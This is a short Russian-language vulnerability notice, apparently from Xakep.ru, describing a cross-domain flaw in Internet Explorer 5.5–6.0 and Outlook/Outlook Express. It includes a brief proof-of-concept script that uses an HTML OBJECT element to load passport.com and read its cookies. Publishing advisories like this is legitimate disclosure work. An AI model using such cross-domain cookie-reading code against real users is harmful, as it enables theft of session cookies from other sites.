Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Один из многих элементов в HTML 4 - элемент OBJECT, который используется для внедрения внешних объектов внутри страницы
(WebBrowser control, ActiveX controls, images, applets и т.п.). 

На внедренный объект WebBrowser controls не действует проверка безопасности Cross Domain, в результате чего можно выйти из
ограничения зоны безопасности. 

Пример (читает куки сайта passport.com): 

<object id="data" data="empty.html" type="text/html"></object> <script> var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com"; setTimeout("alert(ref.cookie)",5000);
</script>

Уязвимость позволяет злонамеренному сайту получать доступ к куки пользователя других сайтов.
Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0, Microsoft Outlook, Microsoft Outlook Express.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии